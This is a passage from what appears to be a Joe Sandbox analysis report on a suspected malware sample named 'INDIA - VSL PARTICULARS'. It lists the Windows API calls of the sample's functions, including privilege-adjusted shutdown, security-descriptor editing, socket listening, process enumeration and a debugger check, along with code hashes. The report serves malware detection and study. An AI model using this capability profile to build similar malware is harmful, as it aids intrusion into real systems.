                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                              • String ID: :$\$\??\%s
                              • API String ID: 2192556992-3457252023
                              • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                              • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                              Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetLocalTime.KERNEL32(?), ref: 004722A2
                              • __swprintf.LIBCMT ref: 004722B9
                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FolderPath$LocalTime__swprintf
                              • String ID: %.3d
                              • API String ID: 3337348382-986655627
                              • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                              • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                              Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                              • FindClose.KERNEL32(00000000), ref: 0044291C
                              • FindClose.KERNEL32(00000000), ref: 00442930
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                              • FindClose.KERNEL32(00000000), ref: 004429D4
                                • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                              • FindClose.KERNEL32(00000000), ref: 004429E2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                              • String ID: *.*
                              • API String ID: 2640511053-438819550
                              • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                              • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                              Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                              • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                              • GetLastError.KERNEL32 ref: 00433414
                              • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2938487562-3733053543
                              • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                              • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                              Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                              • GetLengthSid.ADVAPI32(?), ref: 004461D0
                              • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                              • GetLengthSid.ADVAPI32(?), ref: 00446241
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                              • CopySid.ADVAPI32(00000000), ref: 00446271
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                              • String ID:
                              • API String ID: 1255039815-0
                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                              Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                              Download Yara Rule
                              APIs
                              • __swprintf.LIBCMT ref: 00433073
                              • __swprintf.LIBCMT ref: 00433085
                              • __wcsicoll.LIBCMT ref: 00433092
                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                              • LockResource.KERNEL32(00000000), ref: 004330CA
                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                              • LockResource.KERNEL32(?), ref: 00433120
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                              • String ID:
                              • API String ID: 1158019794-0
                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                              Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                              • String ID:
                              • API String ID: 1737998785-0
                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                              Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                              • GetLastError.KERNEL32 ref: 0045D6BF
                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Error$Mode$DiskFreeLastSpace
                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                              • API String ID: 4194297153-14809454
                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                              Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove$_strncmp
                              • String ID: @oH$\$^$h
                              • API String ID: 2175499884-3701065813
                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                              Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                              Download Yara Rule
                              APIs
                              • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                              • closesocket.WSOCK32(00000000), ref: 00465377
                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                              • closesocket.WSOCK32(00000000), ref: 004653BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLast$closesocket$bindlistensocket
                              • String ID:
                              • API String ID: 540024437-0
                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                              Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                              • API String ID: 0-2872873767
                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                              Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                              • __wsplitpath.LIBCMT ref: 00475644
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscat.LIBCMT ref: 00475657
                              • __wcsicoll.LIBCMT ref: 0047567B
                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                              • String ID:
                              • API String ID: 2547909840-0
                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                              Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                              • Sleep.KERNEL32(0000000A), ref: 0045250B
                              • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                              • FindClose.KERNEL32(?), ref: 004525FF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                              • String ID: *.*$\VH
                              • API String ID: 2786137511-2657498754
                              • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                              • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                              Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                              • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                              • TerminateProcess.KERNEL32(00000000), ref: 00422004
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
